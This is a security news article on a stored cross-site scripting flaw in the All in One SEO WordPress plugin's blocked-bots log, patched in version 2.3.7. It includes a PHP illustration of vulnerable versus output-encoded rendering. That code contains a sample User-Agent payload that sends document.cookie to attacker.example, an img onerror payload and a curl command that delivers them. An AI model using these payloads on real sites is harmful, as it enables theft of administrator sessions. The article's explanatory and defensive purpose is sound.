Semper Fi Web Design, the company behind All in One SEO, a popular WordPress SEO optimization plugin that is active on more than 1M sites, has released version 2.3.7 to patch a persistent (stored) cross-site scripting (XSS) vulnerability.
According to the plugin’s changelog, 2.3.7 sanitizes the Bad Bots module referer and user agent. While that does not sound significant on the surface, the flaw allows an anonymous attacker to get a script payload stored, and later rendered, in the WordPress admin dashboard simply by visiting the public site with a crafted User-Agent or Referer header. No account or interaction with the site beyond a single HTTP request is needed; the payload executes when an administrator views the log.
The vulnerability was reported by David Vaartjes and lies within the Bot Blocker functionality, which blocks certain bots or search engine spiders from crawling a site.
“When the User Agent contains one of the pre-configured list of bot names like ‘Abonti’, ‘Bullseye’ or ‘Exabot’ the request is blocked and a 404 is returned,” Vaartjes said.
“If the ‘Track Blocked Bots’ setting is enabled (not by default), blocked requests are logged in that HTML page without proper sanitization or output encoding, allowing XSS.”
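To make the mechanism concrete, the following PHP is an added illustration written for this article; it is not All in One SEO's code and does not reproduce the plugin's real logging or rendering functions. It mirrors the flow Vaartjes describes: a request whose User-Agent matches a hypothetical block list (using the three names quoted above) is blocked, and, with tracking on, the raw headers are stored and later echoed into an admin page. The vulnerable renderer concatenates the stored strings into HTML; the hardened one output-encodes every field. `esc_html()` is the real WordPress helper, and a stand-in definition is included only so the script runs from the PHP CLI outside WordPress. The sample request, IP address and payloads are constructed.

```php
<?php
// Added illustration, not All in One SEO's code: how a bot-blocking log built
// from raw request headers becomes stored XSS, and the output-encoded fix.

// Stand-in for WordPress esc_html() so this runs from the PHP CLI without WordPress.
// In a plugin you would call the real esc_html() and not define this.
if (!function_exists('esc_html')) {
    function esc_html(string $s): string {
        return htmlspecialchars($s, ENT_QUOTES | ENT_HTML5, 'UTF-8');
    }
}

// Hypothetical block list, using the bot names quoted in the article.
const BLOCKED_BOTS = ['Abonti', 'Bullseye', 'Exabot'];

// Returns the matching bot name if the User-Agent should be blocked, else null.
function matches_blocked_bot(string $user_agent): ?string {
    foreach (BLOCKED_BOTS as $bot) {
        if (stripos($user_agent, $bot) !== false) {
            return $bot;
        }
    }
    return null;
}

// Constructed request: a blocked bot name and a script payload in the same header,
// plus a second payload in Referer. Anyone can send this, e.g.
//   curl -A 'Abonti <script>...</script>' -e '<img src=x onerror=alert(1)>' https://example.com/
$request = [
    'REMOTE_ADDR'     => '203.0.113.7',
    'HTTP_USER_AGENT' => 'Abonti <script>new Image().src="https://attacker.example/?c="+document.cookie</script>',
    'HTTP_REFERER'    => '<img src=x onerror=alert(document.domain)>',
];

// Vulnerable pattern: stored strings are interpolated straight into the admin page,
// so the browser of whoever views the log executes the attacker's markup.
function render_log_vulnerable(array $entries): string {
    $html = "<table>\n";
    foreach ($entries as $e) {
        $html .= "<tr><td>{$e['ip']}</td><td>{$e['ua']}</td><td>{$e['referer']}</td></tr>\n";
    }
    return $html . "</table>\n";
}

// Hardened pattern: every untrusted field is HTML-encoded at the point of output.
// Encoding on output is the fix that holds regardless of what was stored; trimming
// or length-limiting the headers on input is only defence in depth.
function render_log_hardened(array $entries): string {
    $html = "<table>\n";
    foreach ($entries as $e) {
        $html .= '<tr><td>' . esc_html($e['ip']) . '</td><td>' . esc_html($e['ua'])
               . '</td><td>' . esc_html($e['referer']) . "</td></tr>\n";
    }
    return $html . "</table>\n";
}

$bot = matches_blocked_bot($request['HTTP_USER_AGENT']);
if ($bot !== null) {
    // The plugin would answer this request with a 404. With the tracking option
    // enabled it also records the headers; that record is the stored payload.
    $log = [[
        'ip'      => $request['REMOTE_ADDR'],
        'ua'      => $request['HTTP_USER_AGENT'],
        'referer' => $request['HTTP_REFERER'],
    ]];
    echo "Blocked bot: {$bot}\n\n";
    echo "Vulnerable rendering (script tags reach the admin's browser intact):\n";
    echo render_log_vulnerable($log);
    echo "\nHardened rendering (payload displayed as inert text):\n";
    echo render_log_hardened($log);
}
```

Running this with `php` prints the same log entry twice: once with the `<script>` and `<img onerror>` markup intact, once with every `<`, `>` and `"` encoded so the payload is displayed rather than executed. The same two observations are the practical check on a real site: send one request with a blocked bot name and a harmless marker such as `<b>xss-test</b>` in the User-Agent, then open the blocked-bots log as an administrator and confirm the marker appears as literal text. The changelog describes the fix as sanitizing the stored referer and user agent; whichever side of the boundary a plugin does its cleaning on, the invariant to verify is that no request-controlled string is echoed into an admin page unencoded.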
Sites that have the Track Blocked Bots setting disabled (the default) are not exposed, since nothing is logged, but their owners are still strongly encouraged to update to the latest version so that enabling the option later does not reintroduce the risk. All in One SEO 2.3.7 is available for free from the WordPress plugin directory.